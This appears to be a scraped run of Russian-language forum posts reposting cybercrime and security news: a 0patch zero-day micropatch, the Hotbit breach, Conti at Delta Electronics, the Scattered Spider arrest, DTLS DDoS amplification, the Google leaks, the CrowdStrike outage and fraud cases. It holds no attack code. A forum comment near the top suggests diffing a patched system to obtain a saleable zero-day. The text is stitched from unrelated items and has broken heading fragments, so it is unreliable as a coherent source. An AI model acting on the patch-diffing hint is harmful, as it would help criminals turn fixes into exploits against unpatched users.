Специалисты не раскрывают технические детали бага, пока Microsoft не выпустит официальное исправление (чтобы не допустить массовой эксплуатации уязвимости злоумышленниками). Однако исследователи объяснили, что для проведения атаки достаточно заставить пользователя просмотреть специально подготовленный вредоносный файл через File Explorer («Проводник»).
0patch сообщает, что традиционно подготовила бесплатный микропатч для свежей 0-day, который будет доступен всем пользователям платформы, пока Microsoft не выпустит официальное исправление. Для получения неофициального патча достаточно создать бесплатную учетную запись на0patch Central и запустить бесплатную пробную версию продукта.
/* Вроде бы здесь на форуме продавали что-то такое за миллионы денег. Так что если кому-то нужен зиродейчик, качаем 0patch и делаем диф системы */
Организация предупредила пользователей, что хакеры завладели их персональными
данными.
Криптовалютная биржа Hotbit приостановила работу после попытки взлома. На сайте площадки говорится, что злоумышленники провели масштабную кибератаку с целью получить доступ к кошелькам биржи, однако им этого не удалось.
При этом преступники могли завладеть номерами телефонов, адресами электронной почты и информацией об активах клиентов. Кроме того, Hotbit порекомендовала сменить пароли для аккаунтов, особенно если они совпадают с паролями на других сервисах.
На восстановление работы криптобирже потребуется от 7 до 14 дней. За это время планируется полностью перестроить архитектуру серверов.
Hotbit начал работу в начале 2018 года и на сегодняшний день насчитывает более 2 миллионов пользователей, согласно заявлению биржи. Согласно мартовским данным, официальный сайт Hotbit.io посетило 2 миллиона 200 тысяч человек.
Операторы Conti зашифровали 1,5 тыс. серверов и 12 тыс. компьютеров из
примерно 65 тыс. устройств в сети Delta Electronics.
Тайваньская компания по производству электроники Delta Electronics, являющаяся
подрядчиком Apple, Tesla, HP и Dell, стала жертвой кибератаки с использованием
вымогательского ПО.
Delta Electronics является крупнейшим в мире поставщиком импульсных источников
питания, и объем ее продаж в прошлом году составил более $9 млрд.
Как сообщило новостное издание CTWANT, инцидент затронул только некритические
системы и не оказал существенного влияния на работу компании. Кибератака
произошла 18 января нынешнего года.
В настоящее время Delta работает над восстановлением систем, вышедших из строя
во время атаки, и наняла ИБ-экспертов для помощи в расследовании. Поставщик
электроники также уведомил правоохранительные органы. Клиенты Delta могут
использовать этот альтернативный домен, пока компания восстанавливает свой
основной web-сайт.
Хотя в уведомлении Delta Electronics не говорится, кто стоит за атакой,
неназванная ИБ-компания обнаружила образец программы-вымогателя Conti в сети
подрядчика. Как сообщило издание The Record, операторы Conti зашифровали 1,5
тыс. серверов и 12 тыс. компьютеров из примерно 65 тыс. устройств в сети Delta
Electronics.
Вымогательская группировка потребовала выкуп в размере $15 млн за дешифратор и
предотвращение утечки украденных данных. Киберпреступники пообещали скидку,
если компания «рассчитается» быстро.
Британская полиция сообщила об аресте 17-летнего подростка. Подозреваемого считают участником хакерской группировки Scattered Spider, который причастен к атаке на компанию MGM Resorts, которая владеет сетями отелей, курортов и казино по всему миру.
«Мы задержали 17-летнего подростка из Уолсолла, связанного с международной киберпреступной группой, которая атаковала крупные организации с помощью программ-вымогателей и получала незаконный доступ к компьютерным сетям, — гласит заявление правоохранителей. — Офицеры регионального подразделения по борьбе с организованной преступностью в Уэст-Мидлендс, вместе с сотрудниками Национального агентства по борьбе с преступностью, в сотрудничестве с Федеральным бюро расследований США (ФБР), произвели арест в четверг (18 июля 2024 года)».
Подростка арестовали по подозрению в нарушении Закона о шантаже и неправомерном использовании компьютеров, а затем отпустили под залог, пока полиция завершает свое расследование. Также сообщается, что у подозреваемого изъяли различные устрйоства, которые теперь будут изучены для получения дополнительных улик.
«Мы гордимся тем, что помогли правоохранительным органам найти и арестовать одного из предполагаемых преступников, ответственных за кибератаку на MGM Resorts и многие другие организации», — сообщают представители компании MGM.
В полиции Великобритании заявили, что этот арест является частью более широкого расследования, проводимого Национальным агентством по борьбе с преступностью и ФБР в отношении неназванной хакерской группы. И хотя правоохранители не говорят об этом прямо, хакерская группа, стоящая за атакой на MGM Resorts — это Scattered Spider.
Напомним, что Scattered Spider известна и под другими именами: Starfraud, Octo Tempest, Muddled Libra 0ktapus (Group-IB), UNC3944 (Mandiant) и Scatter Swine (Okta).
Считается, что группировка активна с 2022 года, а ее финансово мотивированные атаки в основном направлены на организации, работающие в сфере управления отношениями с клиентами (CRM), аутсорсинга бизнес-процессов, телекоммуникаций и технологий.
Как правило, группа использует сложные схемы с применением социальной инженерии, которые часто связаны с подменой SIM-карт (SIM swap). В частности Scattered Spider известна своими атаками с использованием вымогательского ПО BlackCat (Alphv), Qilin и RansomHub, в том числе против MGM Resorts и сети казино Caesars Entertainment.
Еще осенью прошлого года специалисты Mandiant предупреждали, что Scattered Spider взломали как минимум 100 организаций, в основном расположенных в США и Канаде. При этом еще тогда ИБ-специалисты пришли к выводу, что основной состав Scattered Spider — это англоговорящие подростки в возрасте от 16 до 22 лет, и в целом группировка очень напоминает Lapsus$, чьи участники использовали похожие методы атак и были примерно того же возраста.
• Source: https://www.westmidlands[.]police.uk/news/west- midlands/news/news/2024/july/walsall-teenager-arrested-in-joint-west-midlands- police-and-fbi-operation/
Люди с любым гражданством, совершившие преступления на территории России или против россиян, могут понести ответственность за свои деяния вне зависимости от страны их пребывания. Это случится в том случае, если Государственная дума примет проект изменений в статью 458 УПК РФ, предусматривающий передачу уголовных дел следственным органам других государств.
«Принятие законопроекта должно способствовать реализации такого основополагающего принципа уголовного судопроизводства, как неотвратимость наказания, в том числе и в отношении лиц, скрывающихся от правосудия за пределами России», — сказал соавтор поправок, председатель думского комитета по безопасности и противодействию коррупции Василий Пискарев.
Отдельно отмечается, что за свои преступления должны быть наказаны не только иностранцы, совершившие их на территории России и покинувшие страну, но и россияне, надеющиеся скрыться от правоохранительных органов в ближнем и дальнем зарубежье. Дата рассмотрения проекта поправок пока не определена.
duma.gov.ru/news/59835
Теперь у него ни билета, ни денег.
Дмитрий очень любит футбол и мечтал попасть на финал Лиги чемпионов в Стамбуле, чтобы увидеть баталию "Интера" и "Манчестер Сити". Приобрести билеты через сайт УЕФА он не смог, поэтому решил искать обходные пути. Нашёл в Сети объявление о продаже тикетов на игру за 20 тысяч рублей и написал "продавцу". Тот ответил, что сначала нужно перевести ему деньги, а сам билет придёт через специальное приложение.
Дима перевёл денежку, написал продавцу — и тот… моментально удалил всю переписку и исчез. После этого фанат понял, что его кинули, и пошёл в полицию. Финал, который пройдёт 10 июня, он посмотрит по телевизору.
В Швейцарии по запросу США арестовали российского бизнесмена Владислава Клюшина. Он является владельцем компании «М13», разработавшей систему мониторинга СМИ и соцсетей «Катюша», которую якобы используют российские властные структуры. Изначально о его задержании сообщила местная газета Gotham city. Официальный представитель Федерального офиса юстиции Швейцарии Игнрид Райзер подтвердила «РИА Новости», что господин Клюшин арестован по запросу США по обвинению в финансовых махинациях и ему грозит экстрадиция. AFP уточняет, что Вашингтон подозревает бизнесмена в запуске инсайдерской торговли десятками миллионов долларов.
Пресс-секретарь министерства юстиции Швейцарии сообщила AFP, что посольство США в Берне запросило экстрадицию Владислава Клюшина 19 апреля. «Открытые медиа» пишут со ссылкой на материалы швейцарских судов, что власти США обратились к швейцарской стороне об экстрадиции Владислава Клюшина 20 марта 2021 года, а задержали его 21 марта. 23 марта, сообщило издание, российского бизнесмена арестовали. Бизнесмен подавал апелляцию, прося домашний арест под залог в 1,5 млн швейцарских франков, но она была отклонена в мае.
Пресс-секретарь российского президента Дмитрий Песков сказал, что знает о задержании Владислава Клюшина «из сообщений СМИ». «А что касается его близости к российским властям, близки все граждане нашей страны. Помощь в защите интересов наших граждан за рубежом оказывает МИД»,— прокомментировал «Открытым медиа» ситуацию господин Песков.
Швейцария довольно оперативно реагирует на запросы Вашингтона о выдаче подозреваемых в преступлениях, прямо или косвенно связанных с США. Так, в марте 2011 года по запросу американского Минюста был арестован Владислав Здоровенин, обвиняемый в компьютерном мошенничестве, а в январе 2012-го он уже оказался в тюрьме на территории США. Признав вину, Владислав Здоровенин получил три года заключения и был экстрадирован на родину.
«На моей памяти Швейцария ни разу не отказывала США в выдаче русскоязычных подозреваемых»,— оценил шансы россиянина американский адвокат Аркадий Бух, представлявший интересы Владислава Здоровенина. По его словам, в открытом доступе в судебной системе США обвинительных материалов против Владислава Клюшина пока нет. Однако, по прецеденту, размер наказания находится в зависимости от суммы причинённого ущерба.
«ФБР и прокуратура США обычно ведут двойную игру, запрашивая выдачу тех, кто не только совершил крупное преступление, но и являются обладателями секретной информации»,— добавил Аркадий Бух в комментарии “Ъ”. По его словам, условия содержания в швейцарских тюрьмах намного приемлемей, чем в США, процедура экстрадиции в среднем занимает около года.
Издание «Проект» ранее называло Владислава Клюшина владельцем Telegram-канала «Незыгарь». Господин Клюшин оспаривал эту информацию, 3 июня 2019 года Савеловский районный суд Москвы отказал ему в удовлетворении иска о защите чести и достоинства.
Специалисты компании Netscout предупреждают, что преступники используют относительно новый вектор амплификации DDoS-атак: черед протокол Datagram Transport Layer Security (DTLS), который обеспечивает защищенность соединений для протоколов, использующих датаграммы.
DTLS, как и другие протоколы на основе UDP, подвержен проблеме спуфинга, а значит, его можно использовать в качестве вектора усиления DDoS. То есть хакер может отправлять небольшие DTLS-пакеты на устройство с поддержкой DTLS, и ответ вернется на адрес жертвы в виде куда большего пакета.
По данным экспертов, ранее этот вектор усиления атак применяли лишь продвинутые злоумышленники, но теперь использование DTLS стало доступнее и его предлагают даже разнообразные сервисы для DDoS-атак по найму.
Эксперты подсчитали, что DTLS позволяет усилить атаку в 37 раз. Мощность наиболее крупных атак, замеченных Netscout, составляла примерно 45 Гбит/сек. Более того, злоумышленники объединяли DTLS с другими векторами амплификации, в итоге получая примерно 207 Гбит/сек.
«Атаки состоят из двух или более отдельных векторов, организованных таким образом, чтобы поразить цель всеми этими векторами одновременно. Такие многовекторные атаки являются онлайн-эквивалентом общевойсковой атаки, и главная их идея заключается в том, чтобы сокрушить обороняющихся, как с точки зрения мощности атаки, так и максимально затруднив ее смягчение», — рассказывают эксперты.
Click to expand...
Netscout сообщает, что сейчас в сети можно найти боле 4300 серверов, уязвимых перед этой проблемой. Чаще всего дело в неправильной конфигурации и устаревшем ПО, что приводит к отключению механизмов защиты от спуфинга. В частности, ранее уже было замечено, что уязвимыми зачастую оказываются устройства Citrix Netscaller Application Delivery Controller, хотя разработчики Citrix уже призывали клиентов перейти на более новую версию ПО, где анти-спуфинг включен по умолчанию.
Источник: xakep.ru/2021/03/18/dtls-ddos/
3 февраля американская компания Forward Air , ведущий перевозчик наземным транспортом и малотоннажными судами в Северной Америке , [сообщила](https://xss.is/tg%3A//unsafe_url?url=https%3A%2F%2Fwww.infosecurity- magazine.com%2Fnews%2Fus-shipping-loses-75-million%2F) в Комиссию по ценным бумагам (SEC), что 15 декабря прошлого года подверглась атаке ransomware Hades.
В результате атаки произошли серьезные сбои в работе Forward Air. И хотя компания восстановила свои сервисы, в отчете в адрес SEC она сообщает, что финансовые убытки достигли 7,5 млн. долларов. Входит ли в эту сумму выкуп вымогателям - неясно.
Хотя усилия компании по восстановлению систем завершены и операции компании полностью функциональны, инцидент действительно привел к потере доходов, а также к дополнительным расходам за декабрь, что отрицательно скажется на результатах компании за четвертый квартал 2020 года
Click to expand...
Пресечена деятельность международной криминальной группировки, которая специализировалась на хищениях денежных средств граждан двух государств под предлогом участия в торговле на сырьевых рынках, рынках криптовалют и фондовом рынке «Форекс». Это стало возможным благодаря взаимодействию правоохранительных органов двух государств и своевременному информационному обмену между ними.
«В рамках совместной работы российских и белорусских оперативников и следователей проведено порядка 80 обысков, задержаны около 60 человек.
В Минске проведены обыски в пяти кол-центрах и по адресам проживания участников группы. Изъяты компьютерная техника, мобильные устройства, бухгалтерская документация, получен доступ к облачному хранилищу.
На территории Московского региона полицейские задержали одного из предполагаемых организаторов противоправной деятельности и двоих сообщников. В ходе обысков изъято свыше восьми миллионов рублей, а также порядка 23 миллионов рублей в иностранной валюте, около 30 единиц компьютерной техники.
В нашей стране уголовное дело, возбужденное по признакам преступления, предусмотренного статьей 159 УК РФ, находится в производстве Следственного департамента МВД России. В Беларуси уголовное дело о мошенничестве возбуждено Следственным комитетом. Расследование осуществляется в рамках международной следственно-оперативной группы.
Результаты совместной работы оперативников России и Беларуси по данному уголовному делу Министр внутренних дел Российской Федерации генерал полиции Российской Федерации Владимир Колокольцев обсудил с коллегами на состоявшемся на прошлой неделе в Минске заседании Совета министров внутренних дел государств – участников СНГ», - сообщила официальный представитель МВД России Ирина Волк.
• Video: https://rutube.ru/video/a1ac9b0fb2524715890e384e7959ae45/
71-летнего Владимира Павловича развели по стандартной схеме. Сначала ему позвонили из «полиции» — мол какие-то нехорошие люди взяли на ваше имя кредит и пытаются отправить деньги на Украину. Затем пенсионера поочередно переключали на сотрудников Центробанка и ФСБ. Мужчине начали звонить каждый день, чтобы он брал кредиты и переводил их на безопасные счета. Так продолжалось около недели. За это время пенсионер перевёл мошенникам 2,8 миллиона рублей.
Финал развода произошёл 22 июня. В тот день Владимиру Павловичу сказали приехать к главному офису Сбера на улице Вавилова. Когда мужчина приехал к зданию, мошенники рассказали, что внутри находятся одни бандиты, поэтому нужно устроить скандал. Преступники посоветовали пенсионеру разбить камнем стеклянные двери, а затем подраться с охранником и отнять у него пистолет с рацией. Так Владимир Иванович и поступил — только пистолет отбирать испугался, а просто схватил охранника отделения банка за галстук.
Всё это время он был с мошенниками на громкой связи. В конце концов, после драки с охранниками, наваждение спало. Пенсионер понял, что его обманули, и пошёл писать заявление в полицию. Ущерб — 2,8 млн рублей и порванный галстук охранника.
- сотрудники Службы безопасности оперативно среагировали на неадекватное поведение гражданина в отделении банка и блокировали его до приезда полиции - сообщили в Сбере.
Отчеты Лоренцо Франчески-Биккьяри:
On Thursday, cybersecurity giant Fortinet disclosed a breach involving customer data.
In a statement posted online, Fortinet said an individual intruder accessed “a limited number of files” stored on a third-party shared cloud drive belonging to Fortinet, which included data belonging to “less than 0.3%” of its customers. The company said that the incident “did not involve any data encryption, deployment of ransomware, or access to Fortinet’s corporate network.”
Based on the company’s most recent full-year earnings, Fortinet has “well over half a million customers,” suggesting that the breach may affect at least 1,500 corporate customers of Fortinet.
Click to expand...
Click to expand...
скачать можно по адресу https://xss.is/threads/122781
[ MSN ](https://www.msn.com/en-us/news/technology/fortinet-confirms-customer- data-breach/ar-AA1qwwr9)
поисковика
новые сайты_**
В конце мая в сеть попали внутренние документы Google, раскрывающие некоторые принципы работы поискового алгоритма компании. Например, стало известно, что она использует данные Chrome для ранжирования сайтов и составляет «белые списки» источников под отдельные новостные события. Спустя неделю журналисты узнали о возможных многолетних нарушениях правил безопасности и конфиденциальности пользователей, которые происходили в Google. Компания была вынуждена признать, что все попавшие в сеть данные верны.
параметры влияют на ранжирование сайтов
О первой утечке 27 мая сообщил Рэнд Фишкин — глава компании SparkToro и эксперт в области SEO-оптимизации. Он рассказал, что в начале месяца получил электронное письмо от анонимного источника, который утверждал, что у него есть доступ к большому количеству внутренних документов Google. Отправитель добавил, что подлинность документов подтверждена бывшими сотрудниками компании, которые также поделились с ним дополнительной информацией, связанной с поиском.
Фишкин поговорил с источником по видеосвязи, получил необходимые подтверждения достоверности информации и согласился ее обнародовать. Он также обратился к другому SEO-эксперту, основателю компании iPullRank Майку Кингу, чтобы совместно провести анализ документов. На следующий день после публикации анонимный информатор решил раскрыть свою личность и опубликовал ролик на YouTube. Им оказался SEO-специалист и основатель компании EA Eagle Digital Эрфан Азими.
В распоряжении Рэнда Фишкина и Майка Кинга оказалось 2500 страниц внутренней API-документации, которая по ошибке была загружена на GitHub. Судя по всему, она находилась там с 27 марта по 7 мая, и в этот промежуток времени ее нашел Азими. Информация, доступная в этом документе, является технической — большая ее часть представляет интерес в первую очередь для экспертов в области SEO- оптимизации. Однако она также позволяет узнать чуть подробнее о принципах работы поисковика.
Например, можно сделать вывод, что Google регулярно составляет так называемые «белые списки» сайтов, которые имеют более высокий рейтинг в поисковой выдаче. Ресурсы, которые в них не попадают, напротив, понижаются, и пользователям сложнее найти их при определенном запросе. Фишкин отмечает, что подобные списки использовали как минимум дважды: во время пандемии и выборов в США.
В целом стало понятнее, какие параметры действительно влияют на поиск. Например, Google отрицала, что собирает данные Chrome для ранжирования сайтов. Судя по утечке, это не так: браузер все же упоминается в разделах, посвященных поисковой выдаче. Также компания отрицала, что отдельные факторы, например, авторство контента, могут отражаться на результатах. Майк Кинг в своем разборе отмечает, что показатель E-E-A-T, который в том числе учитывает уровень экспертизы автора, все же влияет на ранжирование сайтов.
Эксперты выделяют еще целый ряд параметров, которые отражаются на выдаче. Например, упоминается система NavBoost, которая анализирует клики с учетом геолокации и делит их на несколько категорий, включая «хорошие», «плохие» и «длинные». Название домена, равно как и узнаваемость бренда в сети, играют важную роль и могут отражаться на результатах выдачи. Также есть отдельная «песочница» для новых сайтов — их ограничивают в выдаче, хотя ранее Google это также отрицала.
«Почти каждый запрос к API в утечках Google имеет географический модификатор —
если вы занимаетесь SEO в местах, где алгоритм менее развит, чем в США (у них
может быть меньше данных, меньше брендов, они не такие узнаваемые и т. д.)
То, что работает для SEO в США, не всегда работает в этих странах, а то, что
работает в этих странах, не всегда работает здесь»
Нельзя сказать, что опубликованная информация является совсем неожиданной для
SEO-экспертов. О каких-то вещах они уже подозревали и раньше. Но, как отмечает
Рэнд Фишкин, многое из того, что попало в утечку, расходится с официальными
заявлениями Google, которые они делали на протяжении многих лет. Это подрывает
доверие к компании. Эксперт надеется, что в будущем публичные комментарии
Google будут рассматриваться более критично.
В Google несколько дней отказывались комментировать утечку, но 30 мая представитель компании Дэвис Томпсон подтвердил изданию The Verge, что попавшие в сеть документы — настоящие. Он также отметил, что не стоит делать некорректные предположения о работе поисковых алгоритмов на основе «вырванной из контекста, устаревшей или неполной информации».
в том числе детских разговоров
Через неделю после первой публикации стало известно о новой утечке. 3 июня журналист издания 404 Media Джозеф Кокс сообщил, что получил от анонимного источника большой массив данных, в котором он нашел подтверждения многочисленных нарушений правил информационной безопасности и конфиденциальности данных.
В утечке содержалась информация о тысячах нарушений, которые были зафиксированы в виде внутренних отчетов в период с 2013 по 2018 год. К ним относятся проблемы со сбором и обработкой данных, ошибки сотрудников, а также уязвимости у сторонних партнеров, услугами которых пользовалась компания. Каждому такому инциденту в отчетах присваивался рейтинг приоритетности, определяющий, насколько срочно требуется устранить ту или иную проблему.
Журналист выяснил, что в 2016 году один из сотрудников компании сообщил, что системы Google Street View расшифровывают и хранят автомобильные номера, которые попадают на фото. Обычно такая информация, равно как и лица людей, размываются для сохранения конфиденциальности. В отчете говорилось, что это произошло непреднамеренно — алгоритм для определения текста на фото в какой-то момент начал считывать в том числе и номера автомобилей. Хотя изначально система была настроена таким образом, чтобы определять их и игнорировать. В результате ошибки в распоряжении компании оказалась целая база геолоцированных номеров или их фрагментов.
Другой инцидент был связан с образовательной платформой Socratic, которую Google приобрела в 2018 году. Выяснилось, что в исходном коде сайта компании больше года хранилось более миллиона адресов электронной почты (в отчете говорилось, что также могли быть доступны IP-адреса и геолокация), в том числе принадлежащих детям. Упоминается еще один случай, затрагивающий несовершеннолетних пользователей. В неуточненный период времени у Google появилась база с записями речи примерно тысячи детей — по какой-то причине не сработал соответствующий фильтр, поэтому система в течение часа записывала их и сохраняла. Эти данные были удалены.
В общей сложности Кокс упомянул больше десятка различных нарушений. Например, однажды пользователя облачного сервиса Google, предназначенного для государственных клиентов, перевели на продукт, предназначенный для обычных потребителей. Это поставило под угрозу конфиденциальность хранившихся в облаке данных. Также упоминается случай, когда из-за сбоя в функции совместных поездок в навигационном приложении Waze (принадлежит Google с 2013 года) утекли данные об адресах и маршрутах пользователей. Другой сбой связан с YouTube — сервис выдавал рекомендации, учитывая видеоролики, удаленные из истории просмотров, что противоречило политике сервиса.
В отдельном тексте Джозеф Кокс рассказал, что в 2017 году один из сотрудников, работавший в Google по контракту, использовал права администратора, чтобы получить доступ к официальному аккаунту игровой компании Nintendo. Он смог найти еще не опубликованный ролик новой неанонсированной игры и поделился им с другом, что привело к утечке. Речь идет об игре Yoshiʼs Crafted World, вышедшей в 2019 году. При этом во внутреннем отчете компании говорится, что утечка могла быть «непреднамеренной».
Представители Google подтвердили журналисту достоверность опубликованной информации. Они также отметили, что рассмотрели каждый внутренний отчет и вынесли по нему соответствующее решение. В некоторых случаях нарушения вообще не требовали вмешательства, или были обнаружены на сторонних сервисах.
Джозеф Кокс добавил, что большинство этих инцидентов действительно быстро устранили, а каждый из них по отдельности мог затронуть лишь небольшое количество людей. Однако он подчеркнул, что опубликованная им информация — хороший пример того, насколько легкомысленно крупнейшие компании мира обращаются с конфиденциальными данными пользователей.
В начале 2021 года пользователи и СМИ заметили, что неисправленный баг нулевого дня в Windows 10 (и более старых версиях ОС, включая Windows XP) позволяет повредить структуру файловой системы NTFS с помощью простой однострочной команды. Эту проблему в прошлом году обнаружил ИБ-исследователь Джонас Ликкегаард. Он долго пытался привлечь внимание к этому багу, но добился успеха лишь несколько месяцев спустя, в 2021 году.
Срабатывание бага и повреждение NTFS можно было спровоцировать, если просто попытаться получить доступ к атрибуту NTFS $i30 определенным образом. Это позволяло любому пользователю или программе, даже с низкими привилегиями, пометить NTFS-диск как поврежденный, просто открыв определенную папку.
Фото: Bleeping Computer
Вскоре злоумышленники и пранкеры стали распространять в Discord и социальных сетях поддельное ПО, вредоносные ярлыки и малварь (1, 2, 3, 4), которые при запуске провоцировали срабатывание этого бага и «падение» Windows.
Мы уже писали о том, что в феврале текущего года Microsoft начала тестировать патч для этой проблемы в сборках Windows Insider (для тех, кто не хотел ждать также было доступно неофициальное исправление). Теперь же, в рамках апрельского «вторника обновлений» компания наконец устранила уязвимость во всех поддерживаемых версиях Windows 10.
В итоге проблема получила идентификатор CVE-2021-28312 и была классифицирована как DoS-баг в Windows NTFS.
Источник: xakep.ru/2021/04/20/ntfs-bud-patched/
protocols because they lack support for recommended cryptographic algorithms and mechanisms
The Internet Engineering Task Force (IETF) formally deprecates Transport Layer
Security (TLS) versions 1.0 (RFC 2246) and 1.1 (RFC 4346). Both versions lack
support for current and recommended cryptographic algorithms and mechanisms.
TLS version 1.2 was recommended for IETF protocols in
2008
and became obsolete with the introduction of TLS version 1.3 in 2018.
The TLS protocol was designed to allow client/server applications to
communicate over the Internet in a secure way preventing message forgery,
eavesdropping, and tampering.
The move to deprecate old versions aims at making products using them more secure.
The IETF now only recommends the use of the two latest versions TLS 1.2 and TLS 1.3.
Experts pointed out that older versions of the protocol were using cryptographic algorithms that were hit by multiple attacks over the years, including as BEAST, [LUCKY 13](https://securityaffairs.co/wordpress/51448/security/openssl-high-severity- flaw.html), POODLE, and [ROBOT](https://securityaffairs.co/wordpress/66682/hacking/robot- attack.html).
Recently the US National Security Agency (NSA) published a guide urging organizations on eliminating obsolete Transport Layer Security (TLS) protocol configurations.
However, the number of organizations that are still using the deprecated versions of the protocol is still high.
At the time of this writing, 33,008,012 systems are still exposing a TLS 1.0 and TLS 1.1 connection point online.
На соседнем борде увидел новость, закинул сюда дедушкам попиздеть от нехуй делать
Заблокировав известные IP-адреса, используемые преступниками, можно
значительно повысить безопасность своих online-активов.
Опытные киберпреступники стараются скрыть свое местоположения за несколькими уровнями прокси, VPN или TOR-узлов. Их IP-адрес никогда не будет напрямую виден компьютерной системе. Кроме того, для проведения атак хакеры всегда будут использовать сторонние IP-адреса.
Существует бесчисленное множество способов проведения кибератак. Но один является общим для всех — необходимость в пуле IP-адресов для использования в качестве среды. Преступникам нужны IP-адреса для проведения распределенных атак типа «отказ в обслуживании», ухода от обнаружения, проведения брутфорс- атак, запуска ботнетов и пр. IP-адреса — самый важный актив злоумышленников.
Киберпреступники получают доступ к IP-адресам различными способами. Плохо защищенные и управляемые группы IoT-устройств, оставленные с учетными данными по умолчанию и устаревшей прошивкой, являются идеальной мишенью для целей хакеров. Также преступники могут отправиться в даркнет и приобрести сеть ботов для проведения атак-DDoS за пару сотен долларов.
Получение IP-адресов требует денег, времени и ресурсов. Вмешавшись в данный процесс, можно нарушить способность преступника эффективно осуществлять свою преступную деятельность. Заблокировав известные IP-адреса, используемые преступниками, можно значительно повысить безопасность своих online-активов.
Специалисты компании CrowdSec провели [эксперимент](https://crowdsec.net/blog/without-and-with-a-crowdsec-bouncer-a- tale-of-two-servers/) . Они настроили два одинаковых виртуальных выделенных сервера (VPS) на известном облачном провайдере с двумя простыми сервисами — SSH и Nginx. На обеих системах был установлен CrowdSec для обнаружения попыток взлома. Кроме того, на одном устройстве был установлен агент исправления (IPS), который получал информацию о репутации IP-адресов от сообщества CrowdSec и превентивно блокировал помеченные IP-адреса. Результат был крайне впечатляющим.
Благодаря «черному списку» устройство с IPS предотвратило 92% атак по сравнению с системой без IPS. Это заметное повышение уровня кибербезопасности.
«Черные списки» IP-адресов не только наносят вред преступникам, сводя на нет их пул IP-адресов. Ведь они потратили время, деньги, ресурсы на их создание, а подобный подход просто отбирает у них ценные ресурсы.
Списки также значительно облегчают жизнь аналитикам и ИБ-экспертам. Благодаря превентивной блокировке хакерских IP-адресов «фоновый шум» значительно снижается. Речь идет о сокращении на 90% предупреждений, которые необходимо анализировать сотрудникам SOC. Это позволяет сосредоточиться на более важных предупреждениях и темах.
Подробнее: https://www.securitylab.ru/news/530832.php?ref=123
Судом Советского района Гомеля постановлен приговор по уголовному делу о хищении денежных средств путем модификации компьютерной информации и мошенничестве, сообщили БЕЛТА в Гомельском областном суде.
Фигурантами по делу проходили три человека, каждый из которых ранее был судим. Одному из них было предъявлено обвинение по нескольким статьям: ч.2 ст.209, ч.4 ст.209, ч.2 ст.212, ч.4 ст.212 УК и др., двум другим - по ч.4 ст.212 УК.
Эта троица с использованием компьютерной техники и доступом в Сеть вступила в состав организованных групп с корыстным умыслом. Они заводили интернет- переписку с посетителями различных сайтов, в том числе популярной торговой платформы. В онлайн-беседе пересылали гиперссылки доступа на веб-страницы фишинговых интернет-ресурсов торговых площадок для несанкционированного сбора банковских реквизитов. "Затем обманом под предлогом приобретения товара убеждали потерпевших ввести на соответствующей веб-странице достаточные для совершения расходных операций данные. Таким способом получили доступ к банковским счетам 56 граждан, с которых пытались похитить и похитили свыше Br51,5 тыс.", - пояснили суть в областном суде.
Также первый фигурант стал участником и другой преступной схемы. Он выполнял роль курьера в цепочке махинаций с предложением благоприятного решения вопросов о непривлечении к уголовной ответственности родственников граждан по якобы совершенным ими ДТП. Таким образом, завладел и пытался завладеть сбережениями пяти престарелых потерпевших - около Br25 тыс.
Приговором суда он признан виновным по всем вменяемым статьям. Окончательно ему назначено наказание в виде лишения свободы на срок семь с половиной лет с отбыванием в исправительной колонии в условиях усиленного режима со штрафом в размере 70 базовых величин.
Доказана и вина двух других фигурантов. Один приговорен к семи годам исправительной колонии в условиях усиленного режима, второй - к шести с половиной годам. Оба также оштрафованы на 100 базовых величин каждый.
Судом также разрешен вопрос о взыскании в пользу потерпевших материального и морального вреда.
Специализирующаяся на кибербезопасности компания CrowdStrike невольно стала причиной массовых сбоев компьютеров на базе Windows по всему миру. Недавнее обновление фирменного защитного ПО компании под названием Falcon Sensor привело к отображению «синих экранов смерти» (BSOD) буквально на всех Windows- устройствах, на которых оно было установлено.
](https://www.securitylab.ru/news/550296.php)
Авиарейсы отменены, биржи остановлены, а телеканалы молчат. Кто остановит катастрофу?
 www.securitylab.ru
сталкиваются с синим экраном смерти ](https://24tv.ua/tech/ru/chto-takoe- crowdstrike-falcon-sensor-i-pochemu-obnovlenie-vyzvalo-globalnyj-sboj-windows- tehno_n2600636)
Компьютеры с Windows по всему миру столкнулись с массовым сбоем 19 июля. Причиной сбоев является неудачное обновление и критическая проблема с программным обеспечением Falcon Sensor от CrowdStrike. Из-за этого многочисленные компьютеры столкнулись с печально известным BSOD, или "синим экраном...
24tv.ua
Согласно принятой в ЕС директиве, страны-члены смогут конфисковывать в рамках уголовных дел средства и имущество, если законность тех не будет доказана или если их стоимость непропорциональна доходам владельца
Евросоюз утвердил директиву, согласно которой государства-члены должны разрешить конфискацию «необъяснимого богатства», полученного преступным путем. Документ размещен в законодательной базе Евросовета и Совета ЕС.
«При определении, следует ли конфисковать имущество, национальные суды должны учитывать все соответствующие обстоятельства дела, включая имеющиеся доказательства и конкретные факты, например то, что стоимость имущества существенно непропорциональна законному доходу лица», — сказано в документе.
Среди других факторов, которые могут говорить в пользу конфискации, названо отсутствие доказательств законности приобретения собственности и связь лица с преступной организацией. При этом доказательство отдельных преступлений не может быть «предварительным условием для конфискации необъяснимого богатства», должно быть подтверждено, что такое имущество или средства получены в результате преступлений.
В числе нарушений, при совершении которых может быть изучен вопрос конфискации, названы любые деяния, совершенные в преступной организации и способные «принести существенную экономическую выгоду».
«Настоящая директива не мешает государствам — членам ЕС принимать меры, позволяющие конфисковывать необъяснимое богатство в связи с другими преступлениями или обстоятельствами», — также сказано в документе. При этом она не применяется к разбирательствам в рамках гражданского права и касается только уголовных преступлений.
sc: data.consilium.europa.eu/doc/document/PE-3-2024-INIT/en/pdf
В Красноярске на скамье подсудимых окажется местный житель 1997 года рождения, который, чтобы раздобыть денег на билет в другую страну, решил взломать банкомат с 5,5 млн рублей. Об этом он сам пояснил на своём допросе в ходе расследования.
Фигурант зашёл в помещение, где установлены терминалы, и с помощью металлического ключа открыл фальшпанель одного из аппаратов, а затем попытался вскрыть и сейф.
При повреждении банкомата сработала сигнализация, в результате чего обвиняемый был задержан на месте.
Росгвардия задержала мужчину и передала его полиции.
По факту происшествия возбуждено уголовное дело.
Скриншот: видео Управления Росгвардии по Новосибирской области
В Новосибирске задержали мужчину, который пытался взломать банкомат Сбербанка
в Калининском районе города.
Инцидент произошел вечером 24 октября на улице Богдана Хмельницкого в помещении круглосуточного доступа банка, сообщает пресс-служба регионального управления Росгвардии.
Экипаж Росгвардии прибыл к зданию банка через две минуты после поступления сообщения о происшествии. Злоумышленника задержали с поличным.
